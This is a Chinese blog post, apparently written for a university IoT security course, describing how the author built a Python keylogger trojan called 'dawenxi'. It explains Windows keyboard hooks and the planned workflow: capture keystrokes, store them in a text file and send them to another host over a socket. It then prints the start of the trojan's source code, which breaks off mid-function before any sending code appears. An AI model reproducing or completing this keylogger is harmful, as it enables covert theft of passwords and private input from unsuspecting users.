一个简单的键盘监听木马dawenxi的制作

事实上,我最初是没想到这学期的物联网安全课程会以答辩形式作为考核的,更没想到的是老师竟然让我们自己设计一个针对物联网的病毒或者针对物联网的漏洞,还要求不能被查杀。这难度,属实大?_? 。可是,我不想挂科啊,就只能硬着头皮来了。
我害怕答辩时会出现功能相似的作品,就没有考虑wifi安全、U盘安全、路由器安全等(果然,答辩的时候一堆这几方面的作品,现在想想,还是后怕,哈哈)。灵感来自于之前上的一门《逆向工程》,在这门课的配套书上,我看到过记录键盘的木马程序。键盘可以说是我们最常用的硬件了,所以键盘的安全问题也就相当于是物联网的安全问题啦?哈哈,就这个了。
首先,我们要知道“消息钩取”的机制。Windows的GUI以事件驱动的方式工作,键盘和鼠标的操作大都会引起事件的产生,产生事件时,操作系统会将预先定义好的消息发送给相应的应用程序,应用程序收到消息后,根据消息的内容执行相应的动作。“消息钩子”就是在事件消息从操作系统向应用程序传递的过程中,获取、查看、修改和拦截这些消息的机制。
我们所用的主要是这个函数:
HHOOK WINAPI SetWindowsHookEx(
_In_int idHook, //被安装的钩子过程的类型,像本次实验中用的WH_KEYBOARD
_In_HOOKPROC lpfn, //指向钩子过程(回调函数)的指针
_In_HINSTANCE hMod, //由lpfn指向的钩子过程所在dll的句柄
_In_DWORD dwThreadId) //钩子过程要被关联到的线程的ID(0:钩子过程关联到所有线程)
还有kernel32.dll、user32.dll、psapi.dll这三个DLL。
user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi.dll获取进程状态
对了,还要介绍一下句柄,因为木马要用到句柄。句柄(Handle)是windows标识,由应用程序建立或使用的对象所使用的一个唯一的整数值(通常为32位)。Windows要使用各种各样的句柄来标识诸如应用程序实例、窗口、文件等对象。句柄是程序用来引用相应对象用的,一个进程被初始化时,系统要为它分配一个句柄表。
好啦,我们可以开始制作木马啦!木马的名字叫dawenxi,没错,就是“要你命三千”的发明者的名字。好的,闻西,木马主要由这几部分构成:
在这里插入图片描述
书上的键盘记录木马是用c语言写的,但是我用的是python语言。提前说明,这个木马是无害的哈!
木马的工作流程如下:钩子函数监听键盘事件—>将监听到的内容生成txt文件存储到本地—>通过套接字发送到其他主机
直接给出木马的程序:

from ctypes import *
import pythoncom  # 提供使用windows com组件的能力
import pyHook
import win32clipboard  # 调用windows剪切板
import socket
if not True:
    import codecs

'''
/**
 *author: guoguo
 *date: 2020/12/21
 *describtion: wobushidawenxia
 */
'''
# 调用核心API,存在于kernel32.dll、user32.dll、gdi32.dll这三个DLL中
user32 = windll.user32  # user32.dll提供用于执行用户界面任务的各个函数,包括键盘、鼠标操作、菜单管理等
kernel32 = windll.kernel32  # kernel32.dll提供操作系统的核心功能服务,包括进程和线程操作、内存管理、文件访问等
psapi = windll.psapi  # psapi.dll获取进程状态
current_window = None  # 将当前窗口值取零

class Trojan_guoguo:

    def get_current_process(self):
        # 获取最上层的窗口句柄
        hwnd = user32.GetForegroundWindow()
        # 获取进程ID
        pid = c_ulong(0)
        user32.GetWindowThreadProcessId(hwnd, byref(pid))
        # 将进程ID存入变量中
        process_id = "%d" % pid.value   
        # 申请内存,用以存放进程
        executable = create_string_buffer("\x00"*512)
        h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)
        psapi.GetModuleBaseNameA(h_process, None
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值